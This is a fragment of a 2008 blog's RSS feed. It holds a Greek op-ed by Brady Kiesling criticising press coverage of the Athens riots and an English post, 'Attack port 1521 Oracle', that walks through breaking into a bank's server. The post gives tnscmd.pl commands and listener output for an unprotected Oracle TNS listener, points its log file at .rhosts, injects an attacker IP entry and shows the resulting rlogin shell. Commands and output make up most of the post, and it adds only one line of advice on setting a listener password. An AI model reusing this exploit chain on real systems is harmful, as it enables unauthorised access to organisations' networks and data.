		<description><![CDATA[Η ελληνική «νύχτα των κρυστάλλων» Του Brady Kiesling* Στις 6 Δεκεμβρίου, ένας Ελληνας αστυνομικός παραβίασε τους σαφείς διατυπωμένους κανόνες εμπλοκής της υπηρεσίας του και χρησιμοποίησε παρανόμως το όπλο του. Ηταν τόσο άτυχος, ώστε να σκοτώσει ένα μικρό παιδί. Οι καταστροφές που ακολούθησαν δεν είχαν όμως καμιά σχέση με την τύχη. Δεκάδες Ελληνες δημοσιογράφοι έσπευσαν να [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=100&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:center;" align="center"><strong><span style="font-family:Times New Roman;font-size:medium;"><span style="font-size:13.5pt;font-weight:bold;">Η ελληνική «νύχτα των κρυστάλλων»</span></span></strong><span style="font-size:medium;"><span style="font-size:13.5pt;"> </span></span></p>
<p><span style="font-family:Times New Roman;font-size:small;"><span style="font-size:12pt;"><br />
</span></span><span style="font-size:medium;"><span style="font-size:13.5pt;">Του Brady Kiesling*</span></span></p>
<p><span style="font-family:Times New Roman;font-size:medium;"><span style="font-size:13.5pt;">Στις 6 Δεκεμβρίου, ένας Ελληνας αστυνομικός παραβίασε τους σαφείς διατυπωμένους κανόνες εμπλοκής της υπηρεσίας του και χρησιμοποίησε παρανόμως το όπλο του. Ηταν τόσο άτυχος, ώστε να σκοτώσει ένα μικρό παιδί. Οι καταστροφές που ακολούθησαν δεν είχαν όμως καμιά σχέση με την τύχη. Δεκάδες Ελληνες δημοσιογράφοι έσπευσαν να βάψουν τα χέρια τους με το αίμα του Αλέξη. Χωρίς να περιμένουν την αυτοψία, τα αποτελέσματα της βαλλιστικής εξέτασης ή το πόρισμα των ανακριτικών αρχών, αποφάνθηκαν ότι η αστυνομία «δολοφόνησε εν ψυχρώ το νεαρό». Προσέθεσαν δε ότι ο θάνατος του Αλέξη ακολουθεί τη λογική παρόμοιων περιπτώσεων στο παρελθόν και ενισχύει τον ισχυρισμό ότι η ελληνική αστυνομία είναι εκτός ελέγχου. Η δέουσα αντίδραση της κοινωνίας απεικονίστηκε από τον ταλαντούχο σκιτσογράφο της «Καθημερινής», Ηλία Μακρή, ο οποίος στις 9 Δεκεμβρίου ζωγράφισε μια πένα να διαπερνά τρεις αστυνομικούς με την επισήμανση «συγγνώμη, εξοστρακίστηκε».</span></span></p>
<p><span style="font-family:Times New Roman;font-size:medium;"><span style="font-size:13.5pt;">Καθώς περπατούσα στη Φιλελλήνων και έβλεπα τους εμπόρους να μαζεύουν τις σπασμένες βιτρίνες των καταστημάτων τους, μου ήλθε στο μυαλό η «Kristallnacht», η «Νύχτα των Κρυστάλλων». Ας μην λησμονούμε άλλωστε ότι οι βανδαλισμοί των καταστημάτων των Εβραίων από τους Ναζί, το 1938, ξεκίνησαν από τη δολοφονία ενός Γερμανού διπλωμάτη στο Παρίσι από έναν Εβραίο θερμοκέφαλο. Το ιδεολόγημα της συλλογικής ενοχής, το οποίο έχει εγκαταλειφθεί εδώ και χρόνια από κάθε πολιτισμένο λαό, ζει και βασιλεύει στον κόσμο της ελληνικής δημοσιογραφίας. Οι αστυνομικοί είναι φονιάδες. Γι’ αυτό πρέπει να τους λούσουμε με βενζίνη και φωτιά. Για να τους φέρουμε σε απόσταση βολής, δεν πρέπει να διστάσουμε να σπάσουμε καταστήματα ή να προβούμε σε εμπρησμούς.</span></span></p>
<p><span style="font-family:Times New Roman;font-size:medium;"><span style="font-size:13.5pt;">Αναμφίβολα, οι Ελληνες δημοσιογράφοι θα προσβληθούν από την εν λόγω σύγκριση. Αλλωστε, το πογκρόμ των τελευταίων ημερών δεν στράφηκε εναντίον Εβραίων ή Αθίγγανων, αλλά εναντίον των τρισκατάρατων αστυνομικών. Για να μην τους προκαλέσω περισσότερο λοιπόν, τους καλώ να διαβάσουν την προκήρυξη της 17 Νοέμβρη μετά το θάνατο του 15χρονου Μιχάλη Καλτεζά από τον αστυνομικό Μελίστα. Η γλώσσα που χρησιμοποιούν σήμερα τα μεγάλα μέσα ενημέρωσης ελάχιστα διαφέρει από εκείνη που χρησιμοποιούσε τότε η τρομοκρατική οργάνωση. Η διαφορά βεβαίως είναι ότι οι Ελληνες δημοσιογράφοι δεν χρειάζεται να παγιδεύσουν το αμάξι ενός αστυνομικού με εκρηκτικά, για να κατακτήσουν το δικαίωμα να παροτρύνουν άλλους να το κάνουν.</span></span></p>
<p><span style="font-family:Times New Roman;font-size:medium;"><span style="font-size:13.5pt;">Η Νύχτα των Κρυστάλλων, ήταν ένας εκτραχηλισμός που απλώς περίμενε την κατάλληλη στιγμή για να ξεσπάσει. Το ίδιο συνέβη και στη σημερινή Αθήνα. Οταν όσοι έχουν κύρος στην ελληνική κοινωνία – δάσκαλοι, πολιτικοί και δημοσιογράφοι – καθιστούν σαφές στους νέους ότι η καταστροφική τους μανία αποτελεί ένδειξη πολιτικής αρετής και δεν θα τύχει οιασδήποτε τιμωρίας, μία μικρή μεν, ικανή δε, ομάδα εξ αυτών θα εκμεταλλευθεί την ελευθερία κινήσεων που της παρέχεται. Για όσους δεν ζουν μόνιμα στην Ελλάδα, η άποψη ότι η Ελληνική Αστυνομία αποτελείται από αυταρχικούς φονιάδες φαντάζει τουλάχιστον βλακώδης. Εκπληκτοι οι τουρίστες παρακολουθούν τους Ελληνες οδηγούς να παραβιάζουν κάθε κανόνα οδικής κυκλοφορίας και ασφάλειας και να παραμένουν ατιμώρητοι. Σε άλλες χώρες, θεωρείται κοινός τόπος ότι ο σεβασμός στους νόμους σώζει πολύ περισσότερες ζωές από όσες καταστρέφει. Στην Ελλάδα όμως, τα ελληνικά σχολεία θρηνούν εκατοντάδες συμμαθητές του Αλέξη κάθε χρόνο, λόγω της ανοχής της κοινωνίας στη δολοφονική συμπεριφορά των οδηγών, στη διαφθορά των επιθεωρητών εργασίας και στην απόρριψη των τοξικών αποβλήτων των εργοστασίων στα ποτάμια.</span></span></p>
<p><span style="font-family:Times New Roman;font-size:medium;"><span style="font-size:13.5pt;">Ο ανεπαρκής εξοπλισμός και εκπαίδευση και το πεσμένο ηθικό της ελληνικής αστυνομίας είναι συμπτώματα και όχι αιτίες της κατάρρευσης του κράτους δικαίου. Κάθε μήνα, το ελληνικό κοινοβούλιο ψηφίζει και έναν καινούργιο κακογραμμένο νόμο για να κατευνάσει την οργή της κοινής γνώμης για κάποια περίπτωση κατάχρησης εξουσίας. Οι Ελληνες, από την πλευρά τους, χειροκροτούν την ψήφιση αυτών των νόμων, αλλά αντιτίθενται στην εφαρμογή τους. Το ίδιο και οι πολιτικοί. Οι ανεφάρμοστοι νόμοι και οι εξευτελιστικοί μισθοί εγγυώνται την άνθηση της διαφθοράς στην ελληνική αστυνομία. Η διαφθορά οδηγεί μαθηματικά στην καταρράκωση του κύρους της. Η έλλειψη κύρους και σεβασμού για τα σώματα ασφαλείας αποτελούν μία πολύ βολική λογική εξήγηση για την ανομία σε όλα τα επίπεδα της ελληνικής κοινωνίας.</span></span></p>
<p><span style="font-family:Times New Roman;font-size:medium;"><span style="font-size:13.5pt;">Πράγματι, υπάρχουν θερμόαιμοι στους κόλπους της αστυνομίας, οι οποίοι ενίοτε υιοθετούν βίαιες συμπεριφορές απέναντι σε όσους μετανάστες πέφτουν στα χέρια τους. Αλλά οι νταήδες αυτοί είναι ταυτόχρονα και δειλοί, ενώ η δημογραφική ομάδα των ανυπεράσπιστων τους οποίους μπορούν να βασανίσουν ατιμώρητα είναι μικρή και συρρικνώνεται συνεχώς. Οι αστυνομικοί που παραβιάζουν τον όρκο τους διακινδυνεύουν την ίδια βραδυκίνητη και επιφυλακτική απονομή δικαιοσύνης που περιμένει κάθε Ελληνα που παρανομεί.</span></span></p>
<p><span style="font-family:Times New Roman;font-size:medium;"><span style="font-size:13.5pt;">Ο σεβασμός του κράτους δικαίου απαιτεί ο θάνατος του Αλέξη να τύχει παραδειγματικής και ταχείας τιμωρίας. Οι δικαστές και οι ένορκοι, έχοντας κατά νου όλα τα στοιχεία της υπόθεσης, οφείλουν να ζυγίσουν από τη μία πλευρά το δικαίωμα της αυτοάμυνας κάθε ανθρώπινου όντος –συμπεριλαμβανομένων και των αστυνομικών– και από την άλλη την υποχρέωση των οργάνων της πολιτείας να προστατεύουν την ανθρώπινη ζωή ακόμη και με κίνδυνο της δικής τους. Η ελληνική κοινωνία θα γίνει υγιέστερη μόνο αν τιμωρηθεί το ίδιο το έγκλημα και όχι αυτό που τα ΜΜΕ αντιλαμβάνονται ως έγκλημα.</span></span></p>
<p><span style="font-family:Times New Roman;font-size:medium;"><span style="font-size:13.5pt;">Κάθε Νύχτα των Κρυστάλλων αποτελεί πλήγμα για τον αυτοσεβασμό ενός έθνους. Αφού διασκεδάσαμε ολόκληρο τον κόσμο με την ανικανότητα της ελληνικής αστυνομίας να υπερασπίσει την Αθήνα ενάντια σε μερικές εκατοντάδες ταραξίες, τώρα μερικοί υπεύθυνοι δημοσιογράφοι αλλάζουν γραμμή προκειμένου να συντονιστούν με τον προβληματισμό της κοινής γνώμης. Ισως τα γεγονότα της περασμένης εβδομάδας να εντάσσονται σε μία ευρύτερη διαδικασία ωρίμασης. Οι δημοσιογράφοι είναι τα χαϊδεμένα παιδιά της ελληνικής κοινωνίας. Ας τους αφήσουμε να δικαιολογήσουν τις ναρκισσιστικές επαναστατικές τους ασκήσεις, παίζοντας το ρόλο της νομιμοποιημένης εκδοχής της 17 Νοέμβρη, αντί να υπερασπιστούν με σθένος, ως οφείλουν, το κράτος δικαίου σε μία στιγμή που το κράτος αποτυγχάνει, όπως τώρα, να προστατεύσει τους πολίτες του.</span></span></p>
<p><span style="font-family:Times New Roman;font-size:medium;"><span style="font-size:13.5pt;">* O κ. Brady Kiesling είναι πρώην διπλωμάτης των ΗΠΑ. Παραιτήθηκε σε ένδειξη διαμαρτυρίας για την εισβολή των ΗΠΑ στο Ιράκ κι έκτοτε ζει μόνιμα στη χώρα μας.</span></span></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/kavasilo.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/kavasilo.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/kavasilo.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/kavasilo.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/kavasilo.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/kavasilo.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/kavasilo.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/kavasilo.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/kavasilo.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/kavasilo.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/kavasilo.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/kavasilo.wordpress.com/100/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/kavasilo.wordpress.com/100/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/kavasilo.wordpress.com/100/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=100&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://kavasilo.wordpress.com/2008/12/15/%ce%b7-%ce%b5%ce%bb%ce%bb%ce%b7%ce%bd%ce%b9%ce%ba%ce%ae-%c2%ab%ce%bd%cf%8d%cf%87%cf%84%ce%b1-%cf%84%cf%89%ce%bd-%ce%ba%cf%81%cf%85%cf%83%cf%84%ce%ac%ce%bb%ce%bb%cf%89%ce%bd%c2%bb/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/c667b813ce7a0a182430234752a0f9ea?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kavasilo</media:title>
		</media:content>
	</item>
		<item>
		<title>Attack port 1521 Oracle</title>
		<link>http://kavasilo.wordpress.com/2008/11/27/attack-port-1521-oracle/</link>
		<comments>http://kavasilo.wordpress.com/2008/11/27/attack-port-1521-oracle/#comments</comments>
		<pubDate>Thu, 27 Nov 2008 11:43:59 +0000</pubDate>
		<dc:creator>kavasilo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://kavasilo.wordpress.com/?p=89</guid>
		<description><![CDATA[You can find the same post at www.p0wnbox.com ( Its a wonderfull site from greek geeks focus on IT Security, So i posted this article there too) Many large organizations are using Oracle DB. As a pen tester i always found port 1521 open and the remote Oracle tnslsnr has no password assigned. The pen [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=89&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>You can find the same post at www.p0wnbox.com ( Its a wonderfull site from greek geeks focus on IT Security, So i  posted this article there too)</p>
<p>Many large organizations are using Oracle DB. As a pen tester i always found port 1521 open and the remote Oracle tnslsnr has no password assigned. The pen tester may use this fact to shut it down arbitrarily, thus preventing legitimate users from using it properly. You should use the lsnrctrl SET PASSWORD command to assign a password to the tnslsnr.</p>
<p>The following shows the individual stages of the successful attack against some European bank. The whole internal LAN was compromised through that server and specific through port 1521.</p>
<p><!--[if gte mso 9]&gt;  Normal 0   false false false        MicrosoftInternetExplorer4  &lt;![endif]--><!--[if gte mso 9]&gt;   &lt;![endif]--><!--  /* Font Definitions */  @font-face 	{font-family:CourierNewPSMT; 	panose-1:0 0 0 0 0 0 0 0 0 0; 	mso-font-alt:"Times New Roman"; 	mso-font-charset:0; 	mso-generic-font-family:roman; 	mso-font-format:other; 	mso-font-pitch:auto; 	mso-font-signature:3 0 0 0 1 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0cm; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:612.0pt 792.0pt; 	margin:72.0pt 90.0pt 72.0pt 90.0pt; 	mso-header-margin:36.0pt; 	mso-footer-margin:36.0pt; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --><!--[if gte mso 10]&gt; &lt;!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} table.MsoTableGrid 	{mso-style-name:"Table Grid"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	border:solid windowtext 1.0pt; 	mso-border-alt:solid windowtext .5pt; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-border-insideh:.5pt solid windowtext; 	mso-border-insidev:.5pt solid windowtext; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} --> <!--[endif]--></p>
<table class="MsoTableGrid" style="border:medium none;border-collapse:collapse;height:810px;" border="1" cellspacing="0" cellpadding="0" width="459">
<tbody>
<tr>
<td style="border:2.25pt solid windowtext;width:426.1pt;padding:0 5.4pt;" width="568" valign="top">
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">$ tnscmd.pl status –h xxx.xxx.xxx.xxx</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">connect writing 89 bytes   [(CONNECT_DATA=(COMMAND=status))]</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">.Y&#8230;&#8230;.6.,&#8230;&#8230;&#8230;&#8230;&#8230;:&#8230;&#8230;&#8230;&#8230;&#8230;.4&#8230;&#8230;&#8230;&#8230;.(CONNECT_DATA=(C</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">OMMAND=status))</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">read</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">&#8230;&#8230;&#8230;6&#8230;&#8230;&#8230;}&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;.</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(DESCRIPTION=(TMP=)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(VSNNUM=135290880)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(ERR=0)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(ALIAS=LISTENER)</span></p>
<p class="MsoNormal"><span style="font-size:7.5pt;font-family:Arial;" lang="EN-GB">(SECURITY=OFF)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(VERSION=TNSLSNR.for.IBM/AIX.RISC.System/6000:.Version.8.1.6.0.0.-</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">.Production)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(START_DATE=xxxxxxxxxx)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(SIDNUM=1)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(LOGFILE=/home/oracle/app/oracle/product/8.1.6/network/log/listener.log)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(PRMFILE=/home/oracle/app/oracle/product/8.1.6/network/admin/listener.ora)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(TRACING=off)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(UPTIME=37107630)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(SNMP=ON))&#8230;&#8230;&#8230;.(ENDPOINT=(HANDLER=(STA=ready)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(HANDLER_ID=E858D3D8EB6C-6832-E033-</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">C22A01016832)(PRE=ttc)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOS</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">T=DOMAIN_NAME)(PORT=1521))))),,</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLIS</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">HED=0)(REFUSED=0)(HANDLER_ID=E858D3D8EB6D-6832-E033-</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">C22A01016832)(PRE=ttc)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">=EXTPROC))))),,</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(SERVICE=(SERVICE_NAME=PLSExtProc)(INSTANCE=(INSTANCE_NAME=PLSExtProc)(NUM</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">=1)(INSTANCE_CLASS=ORACLE)(NUMREL=1))),,</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(SERVICE=(SERVICE_NAME=oracc)(INSTANCE=(INSTANCE_NAME=oracc)(NUM=1)(INSTAN</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">CE_CLASS=ORACLE)(NUMREL=1))(INSTANCE=(INSTANCE_NAME=oracc)(NUM=2)(INSTANCE</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;">_CLASS=ORACLE)(NUMREL=2))),,&#8230;&#8230;&#8230;@</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;">eon</span></p>
</td>
</tr>
</tbody>
</table>
<p>Testing the status with tnscmd: The security level is not set. So, no passwords are needed<br />
for set commands. I tried to set the log file to /home/oracle/.rhosts</p>
<table class="MsoTableGrid" style="border:medium none;border-collapse:collapse;" border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="border:2.25pt solid windowtext;width:426.1pt;padding:0 5.4pt;" width="568" valign="top">
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">$ tnscmd.pl –h xxx.xxx.xxx.xxx –rawcmd   “</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(DESCRIPTION=   (CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(COMMAND=log_file)(ARGUMENTS=4)   (SERVICE=LISTENER) (VERSION=1)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(VALUE=/home/oracle/.rhosts)))&#8221;</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">sending&#8230;</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;">)(ARGUMENTS=4)(SERVICE=LISTENER)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(VERSION=1)(VALUE=/home/oracle/.rhosts)))</span></p>
</td>
</tr>
</tbody>
</table>
<p>It was possible to set a new path (/home/oracle/.rhosts) for the log file. Now lets try to<br />
connect to the Oracle database to generate an entry with my IP address in the new log<br />
file (this is now the .rhosts).</p>
<p><!--[if gte mso 9]&gt;  Normal 0   false false false        MicrosoftInternetExplorer4  &lt;![endif]--><!--[if gte mso 9]&gt;   &lt;![endif]--></p>
<table class="MsoTableGrid" style="border:medium none;border-collapse:collapse;" border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="border:2.25pt solid windowtext;width:426.1pt;padding:0 5.4pt;" width="568" valign="top">
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">$ tnscmd.pl -h VICTIM_IP&#8211;rawcmd   &#8220;(CONNECT_DATA=((</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">Attacker_IP oracle</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">&#8220;</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">writing 93 bytes</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">sending (CONNECT_DATA=((</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">to VICTIM_IP:1521</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">.$&#8230;..&#8221;..(DESCRIPTION=(ERR=1153)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(ERROR_STACK=(ERROR=i(CODE=1153)(EMFI=4)</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">(ARGS=&#8217;(CONNECT_DATA=((. Attacker_IP oracle&#8217;))</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;">(ERROR=(CODE=303)(EMFI=1))))</span></p>
</td>
</tr>
</tbody>
</table>
<p>Now it should be possible to login to the server because i edit the .rhosts file and add the following<br />
line: “MY_IP oracle”</p>
<p><!--[if gte mso 9]&gt;  Normal 0   false false false        MicrosoftInternetExplorer4  &lt;![endif]--><!--[if gte mso 9]&gt;   &lt;![endif]--></p>
<table class="MsoTableGrid" style="border:medium none;border-collapse:collapse;" border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="border:2.25pt solid windowtext;width:426.1pt;padding:0 5.4pt;" width="568" valign="top">
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">$ rlogin xxx.xxx.xxx.xxx -l oracle</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">************************************************************************</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">BANK OF XXXXXXXXXX *</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">* ACCESS FOR AUTHORISED USERS ONLY</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">*</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">* http://www.xxxxxxxxxxx.com</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">*</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">***********************************************************************</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">Last unsuccessful login: Wed 10 Nov   2008 15:45:57 on ssh from xxx.xxx.xxx.xxx</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">Last login: Fri 12 Nov 2008 15:24:57   on /dev/pts/9 from xxx.xxx.xxx.xxx</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">[YOU HAVE NEW MAIL]</span></p>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:CourierNewPSMT;" lang="EN-GB">$</span></p>
</td>
</tr>
</tbody>
</table>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/kavasilo.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/kavasilo.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/kavasilo.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/kavasilo.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/kavasilo.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/kavasilo.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/kavasilo.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/kavasilo.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/kavasilo.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/kavasilo.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/kavasilo.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/kavasilo.wordpress.com/89/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/kavasilo.wordpress.com/89/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/kavasilo.wordpress.com/89/" /></a> <img alt="" border="0" 